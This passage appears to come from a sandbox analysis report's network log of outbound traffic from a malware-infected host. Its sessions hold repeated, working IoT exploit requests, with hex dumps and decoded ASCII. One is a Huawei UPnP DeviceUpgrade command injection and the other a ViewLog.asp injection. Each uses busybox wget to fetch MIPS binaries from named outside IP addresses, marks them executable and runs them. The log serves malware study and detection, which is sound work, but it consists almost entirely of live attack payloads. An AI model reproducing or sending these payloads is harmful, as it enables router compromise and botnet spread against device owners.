                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:10.694417000 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              229192.168.2.135550631.136.86.48080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:10.540867090 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.606626034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.750504017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:31.782538891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:56.358424902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.510277987 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              230192.168.2.135911631.136.155.318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:10.540927887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.606627941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.750514984 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:31.782548904 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:56.358423948 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.510267973 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              231192.168.2.1335242156.198.243.12337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.452014923 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:11.768851995 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              232192.168.2.133411894.121.112.668080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.554368019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              233192.168.2.135522662.174.26.2178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.607096910 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              234192.168.2.134131231.136.182.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.737785101 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:12.294536114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.414498091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:15.654531002 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:20.262511015 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:29.222491026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.166496992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
